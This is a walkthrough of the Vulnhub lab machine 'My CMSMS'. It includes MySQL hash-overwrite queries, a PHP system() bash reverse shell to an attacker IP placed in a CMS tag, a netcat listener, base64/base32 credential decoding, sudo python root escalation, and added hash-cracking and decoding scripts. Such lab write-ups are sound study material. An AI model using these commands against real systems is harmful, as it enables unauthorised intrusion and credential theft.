My cmsms Vulnhub Walkthrough


In this post we solve another Vulnhub machine, My CMSMS, created by Pankaj Verma. The difficulty is rated easy to intermediate, and the goal is the root flag in the /root directory. You can download the VM here.

Description

This VM has been designed by Pankaj Verma. This box contains some interesting things about CMS. It has been designed in a way to enhance the user's skills while playing with some privileges. It's a quite straightforward box, but stay aware of rabbit holes.

Network Scanning

Let's start with netdiscover to find the target's IP address on the local network.

netdiscover

Now that we have the target IP address, 192.168.1.3, the next step is enumerating open ports and running services with nmap's -A option (version detection, OS detection, default scripts and traceroute).

nmap -A 192.168.1.3

The scan shows three open ports on the target: 22 (SSH), 80 (Apache httpd) and 3306 (MySQL). MySQL reachable from the network is already worth noting, since it is normally bound to localhost only.

Enumeration

We start enumeration by browsing the web server on port 80, but find nothing useful there, so we move on to the MySQL service on port 3306. After trying a few common passwords we log in as the MySQL root user with the password root.

mysql -h 192.168.1.3 -u root -p
show databases;
use cmsms_db;

There are four databases; we pick cmsms_db, which holds the CMS Made Simple tables. Dumping username, email and password from cms_users shows a single entry, the admin user. CMS Made Simple stores admin passwords as md5(sitemask . password), where sitemask is a per-site salt kept in cms_siteprefs. Rather than cracking the stored hash, we can write a new one: the UPDATE below computes the hash of 'hackNos' with the site's own mask and sets it as the admin password.

select username,email,password from cms_users;
update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'hackNos'))) where username = 'admin'; 
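The following is an added example, not code from the original post: it reproduces the md5(sitemask . password) scheme that the UPDATE above relies on, and uses it for the quieter alternative of cracking the dumped hash offline instead of overwriting it. The sitemask value and the wordlist are constructed for the demo; on a real target the mask comes from SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'.

```python
import hashlib
from typing import Iterable, Optional


def cmsms_hash(sitemask: str, password: str) -> str:
    """Reproduce the CMS Made Simple admin password hash: md5(sitemask . password).

    This is the same expression as md5(CONCAT(sitemask, 'hackNos')) in the UPDATE
    query; sitemask is the per-site salt stored in cms_siteprefs.
    """
    return hashlib.md5((sitemask + password).encode()).hexdigest()


def crack_cmsms_hash(stored_hash: str, sitemask: str,
                     wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack against a dumped cms_users.password value.

    Recovering the real password leaves the database untouched, which is less
    noisy than replacing the admin hash as the walkthrough does.
    Returns the matching candidate, or None if nothing in the wordlist matches
    or the stored value is not a 32-hex md5 (a different hashing scheme).
    """
    if len(stored_hash) != 32 or any(c not in "0123456789abcdefABCDEF" for c in stored_hash):
        return None
    target = stored_hash.lower()
    for candidate in wordlist:
        if cmsms_hash(sitemask, candidate) == target:
            return candidate
    return None


if __name__ == "__main__":
    # Constructed demo values, not taken from the target VM.
    sitemask = "a9f3c1e2"
    # Stands in for the value dumped from cms_users.password.
    dumped = cmsms_hash(sitemask, "hackNos")
    print("stored hash:", dumped)
    print("cracked:", crack_cmsms_hash(dumped, sitemask, ["password", "admin", "hackNos"]))
```

If cms_users.password is not a 32-character hex string, the install is using a different hashing scheme and neither this script nor the UPDATE query above applies as written.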

With the hash replaced, we browse to the admin login URL and log in with the username admin and the password hackNos.

http://192.168.1.3/admin/login.php
  • USERNAME: admin
  • PASSWORD: hackNos

Once in the admin panel we go to Extensions -> User Defined Tags. User Defined Tags are PHP snippets that the CMS executes whenever the tag is rendered, so anyone with admin access can turn them into arbitrary code execution. We click edit on the user agent tag and replace its code with a PHP system() call that launches a bash reverse shell to our attacking machine, 192.168.1.2; from there we can run any Linux command.

system("bash -c 'bash -i >& /dev/tcp/192.168.1.2/4545 0>&1'");

Next we start a netcat listener on port 4545 and trigger the tag by requesting the page that renders it with curl.

nc -lvp 4545
curl -vv http://192.168.1.3/index.php?page=user-defined-tags

Now we have a reverse shell on the target as the web server user. Enumerating the file system for weak files and services, we find a hidden dot-file, .htpasswd, in the admin directory under the Apache document root. Its contents are a base64 string.

ls | head -n 2
cd admin
ls -la | head -n 5
cat .htpasswd

We copy the text and decode it with the built-in base64 tool using the -d option; the output is itself a base32 string, which we decode with base32 -d.
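As an added example (not from the original post), the script below generalises the base64-then-base32 peeling done by hand above: it keeps decoding a blob while the result is valid base32, base64 or hex and still looks like text, and reports each layer. The sample .htpasswd content is constructed inline for the demo and is not the real file from the VM.

```python
import base64
import binascii
import re
import string
from typing import List, Optional, Tuple

B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")
B32_RE = re.compile(r"[A-Z2-7]+={0,6}")
HEX_RE = re.compile(r"[0-9a-fA-F]+")
PRINTABLE = set(string.printable.encode())


def _is_text(data: bytes) -> bool:
    """Accept a decoding only if every byte is printable ASCII."""
    return len(data) > 0 and all(b in PRINTABLE for b in data)


def decode_once(s: str) -> Optional[Tuple[str, str]]:
    """Try one decoding layer; return (encoding, plaintext) or None."""
    s = s.strip()
    # Base32 is checked first: its alphabet (A-Z, 2-7, =) is also valid base64,
    # so a base32 string would otherwise be mis-decoded as base64 garbage.
    if len(s) % 8 == 0 and B32_RE.fullmatch(s):
        try:
            out = base64.b32decode(s)
            if _is_text(out):
                return "base32", out.decode()
        except binascii.Error:
            pass
    if len(s) % 4 == 0 and B64_RE.fullmatch(s):
        try:
            out = base64.b64decode(s, validate=True)
            if _is_text(out):
                return "base64", out.decode()
        except binascii.Error:
            pass
    if len(s) % 2 == 0 and HEX_RE.fullmatch(s):
        try:
            out = bytes.fromhex(s)
            if _is_text(out):
                return "hex", out.decode()
        except ValueError:
            pass
    return None


def peel(blob: str, max_layers: int = 10) -> List[Tuple[str, str]]:
    """Strip encoding layers until nothing decodes to printable text."""
    layers = [("raw", blob.strip())]
    current = blob
    for _ in range(max_layers):
        step = decode_once(current)
        if step is None:
            break
        layers.append(step)
        current = step[1]
    return layers


# Constructed sample: a made-up password wrapped in base32, then base64,
# the same layering the walkthrough found in .htpasswd.
SAMPLE_SECRET = "example-pass!"
SAMPLE_HTPASSWD = base64.b64encode(base64.b32encode(SAMPLE_SECRET.encode())).decode()

if __name__ == "__main__":
    for encoding, text in peel(SAMPLE_HTPASSWD):
        print(f"{encoding:>7}: {text}")
```

Eyeball every layer it prints: a short word made only of base64 characters can decode to printable bytes by coincidence, so the last layer that reads like a credential, not necessarily the last layer printed, is the one to try.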

The decoded text turns out to be the password of the armour user, so we switch to that account with su, confirm with id, and upgrade to a proper TTY with python3.

su armour
id
python3 -c 'import pty;pty.spawn("/bin/bash")'

Privilege Escalation

For privilege escalation we run sudo -l and see that armour may run /usr/bin/python as root without a password. Any interpreter allowed through sudo is a full root shell, because it can simply spawn /bin/bash.

sudo -l
sudo /usr/bin/python -c 'import pty;pty.spawn("/bin/bash")'
id

We now have a root shell on the target. Change into /root and read proof.txt to complete the challenge.

cd /root
ls
cat proof.txt


About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

